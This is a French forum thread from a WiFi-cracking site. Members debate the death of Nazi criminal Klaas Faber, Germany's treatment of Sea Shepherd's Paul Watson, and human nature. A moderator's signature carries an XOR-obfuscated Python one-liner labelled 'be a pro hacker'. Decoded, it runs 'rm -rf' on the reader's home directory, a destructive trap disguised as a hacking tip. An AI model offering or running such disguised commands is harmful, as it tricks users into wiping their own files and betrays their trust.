Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-08-2012 16:39:14

steph06
Membre Indétronable
Site Web

INFO : Décès Klaas Faber

AVANT-PROPOS : ça n'a pas de rapport avec le WiFi, mais la section "discussion" l'accorde ;-)

C'est avec stupeur et tristesse que j'ai appris aujourd'hui le décès de Klaas Faber.

Klaas Faber était un criminel nazi...... Forcément, si j'arrête ici l'information, je ne suis pas malheureux du tout don son décès naturel (j'aurai plutôt souhaité qu'il ne naisse pas).

Klaas Faber était un criminel nazi, il avait été condamné à mort par les Pays Bas en 1947 pour avoir tué 22 juifs. Détenu en prison, il réussi à s'en évader pour se réfugier en Allemagne.
Oui, depuis 1952, Klaas Faber vivait paisiblement en Allemagne, sans être inquiété, malgré un mandat d'arrêt Européen.

L'Allemagne gardait jusqu'à tout récemment ce néerlandais criminel nazi, malgré l'insistance de nombreux pays, plusieurs jugements, mandat d'arrêt etc : "non, nous, gouvernement d'Allemagne, nous refusons de vous l'extrader. Il est très bien LIBRE chez nous".

Source : http://www.rtbf.be/info/societe/detail_ … id=7776306

PENDANT CE TEMPS .... Le 13 Mai 2012 ...
Le fondateur de Sea Shepherd (ONG de Défense des Océan), Paul Watson, n'ayant jamais blessé personne, n'ayant jamais eu la moindre condamnation, n'ayant aucun mandat d'arrêt international à son encontre, faisant juste son rôle de citoyen en appliquant la Charte Mondiale pour la Nature (émise par l'ONU et signée par les 197 pays membres) pour défendre légalement les océans, a été arrêté en Allemagne le 13 mai 2012 à la demande du Costa Rica pour avoir commis une infraction du droit maritime (navigation) en 2002...... En réalité il était en train de s'opposer activement (et sans blesser, preuves vidéos à l'appui) à la pratique illégale de finning (découpe d'ailerons de requin). Les vidéos ont d'ailleurs servit à la réalisation du film "Le Seigneur de la Mer" :
=> http://www.youtube.com/playlist?list=PLBBAA58952B1CF5BB

Le Costa Rica a demandé son extradition au gouvernement Allemand, et le dossier a suivi son cours en Allemagne malgré des milliers de manifestations ...

Paul Watson a d'bord été détenu en prison, puis obligé de pointer deux fois par jour au commissariat Allemand le temps que le dossier se concrétise.
Le 19 juillet 2012, le Japon a officiellement demandé à l'Allemagne d'extrader Paul Watson. Motif : avoir entravé leur chasse (illégale partout dans le monde) aux baleines, chaque année de 2004 à 2011, en plein sanctuaire baleinier (océan Austral, pôle sud)

Et l'Allemagne a ..... accepté officiellement la demande d'extradition (!!).
Les informations sont floues pour savoir si l'Allemagne a accepté auprès du gouvernement du Costa Rica ou auprès du gouvernement du Japon. D'autant plus que le Japon avait déjà fait les démarches officielles auprès du Costa Rica pour récupérer à leur tour Paul Watson (le Costa Rica a dores et déjà accepté).

Devant un avenir à très court terme menaçant tout simplement sa vie (le Japon le considère officiellement comme terroriste, et là bas les droits de l'homme n'y sont pas), Paul Watson n'a pas eu d'autre choix que de partir d'Allemagne. Et les autorités Allemande ont simplement déclaré que depuis le 22 juillet 2012 Paul Watson n'était plus venu déclarer sa présence au commissariat . Le conseiller juridique de Paul W. a confirmé officiellement le départ de Paul W.
Personne ne sait où il est aujourd'hui ... et tant mieux !

Paul Watson a récemment fait un communiqué.
* En anglais :
http://www.seashepherd.org/news-and-med … rmany-1413

* En français : .... traduit automatiquement par Google (attention)
http://translate.google.com/translate?s … rmany-1413
... ou patientez 2 petits jours pour le voir correctement traduit sur www.seashepherd.fr

Si vous ne connaissiez pas Sea Shepherd, voici une courte vidéo de présentation (3 minutes)
http://www.youtube.com/watch?v=s62NfTdyWPs
Ce qu'ils font est tout simplement superbe et efficace (et légal) ! BRAVO !

C'est donc avec stupeur et tristesse que j'ai appris aujourd'hui l'histoire de Klaas Faber, en faisant le parallèle avec l'actualité récente de Paul Watson en Allemagne.
Il est évident de pointer du doigt le gouvernement Allemand. J'accuserai également de complicité tous les pays qui sont restés les bras croisés (tous les pays d'Europe, et même au-delà).

Le genre humain est décidément POURRI !

Stéphane

PS : si vous avez des questions (et que je peux y répondre ;-) ), n'hésitez pas.

Dernière modification par steph06 (01-08-2012 17:07:41)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 08-08-2012 19:47:45

spawn
Modérateur

Re : INFO : Décès Klaas Faber

Ce sont des choses qui arrivent.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 09-08-2012 06:45:18

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Je partage ton indignation. Et si tu creuses un peu le sujet tu te rendras comptent que pas mal de bourreaux de cette époque on parfaitement réussis leur reconversion avec leur joli c.v.
Un exemple particulièrement  dégueulasse est la "Colonie dignité" très propice sous l'ère Pinochet (encore un exemple de tortionnaire qui mourra dans son lit avec des draps de soie et des charentaises en fil d'Écosse aux pieds)

Le genre humain est décidément POURRI !

Pas d'accord, pas tout à fait tout du moins... Tu oublies ceux qui ont résistés, qui sont morts pour d'autres ou pour des idées généreuses.
Es-tu plus pourris qu'un autre si tu es un jeune appelé allemand de 18 ans sortis de sa campagne exsangue (le crash de wall street de 29 fût particulièrement désastreux pour l'économie allemande sous perfusion des investisseurs américains) et qu'on t'oblige à prendre les armes?
Une fois au combat, c'est la guerre, tu tues pour ne pas mourir et point.
C'est la guerre, provoquées par des fous... alors oui, on voit le pire du genre humain, mais on voit aussi des femmes et des hommes avec un courage hallucinant; inspirant.
Je suis convaincu de que la majorité du genre humain ne pense pas à aller conquérir le monde et exterminer telle ou telle minorité et que la plupart des gens aspirent simplement à vivre décemment et en paix...
Donc pour moi l'humanité n'est pas pourrie. Corruptible, manipulable et manipulée, sur un chemin bien dangereux.
Pas de quoi être optimiste, mais tomber dans cette posture c'est à mon sens adopter un discours / une pensée très dangereuse car au bout du compte elle légitime la répression et l'appareil coercitif et crée une ambiance très favorable à l'émergence des fhurer, duce et autres...

AVANT-PROPOS : ça n'a pas de rapport avec le WiFi, mais la section "discussion" l'accorde ;-)

Elle ne "l'accorde" pas; elle est tout simplement là pour ça wink

#4 12-08-2012 12:18:27

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

kcdtv a écrit :

Es-tu plus pourris qu'un autre si tu es un jeune appelé allemand de 18 ans sortis de sa campagne exsangue (le crash de wall street de 29 fût particulièrement désastreux pour l'économie allemande sous perfusion des investisseurs américains) et qu'on t'oblige à prendre les armes?

La deuxième guerre mondiale était dors et déjà écrite à la signature de l'armistice de la guerre 14-18.

Quand il a vu les conditions de l'époque imposées à l'Allemagne par le texte (sous la pression de la France) et vu comme un traité garantissant la paix, un homme politique de l'époque dont le nom m'échappe pour le moment, a tout de suite dit :

"Ce n'est pas la paix que l'on vient de signer, mais une armistice de 20 ans". Il avait raison...

Et en effet le crash de 29, l'occupation du bassin de la ruhr, le lot de tarés paranos de certains gouvernements (Musso, Adolf, Joseph) et l'amertume des allemands qui n'avaient pas digéré une défaite jugée "plolitique" à l'époque a certainement été cruciale dans l'enchaînement qui a mené au second grand massacre.

Sans compter la passivité des "alliés" qui ont refusé de voir arriver la guerre alors que tout indiquait que ça allait tomber. Il n'y a que Churchill (j'adore ce gars) qui a essayé de les remuer mais sans y parvenir. Même une fois la Pologne sacrifiée ....

kcdtv a écrit :

Une fois au combat, c'est la guerre, tu tues pour ne pas mourir et point.

C'est assez logique en effet mais ça ne justifie pas tout, ce n'est qu'un cas de figure. Tous les soldats Allemands ou les enrôlés n'étaient pas forcément des Nazis, mais parmis les nazis en revanche, beaucoup ont fait leur sale besogne avec zèle.

Après je ne sais pas si le genre humain est pourri ou non. Mais quand il n'y a plus de barrières posées en général ce n'est pas le "bon" qui s'impose "naturellement", sinon on ne serait pas obligé de faire continuellement pour préserver la paix ...

Dernière modification par noireaude (12-08-2012 12:26:35)

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce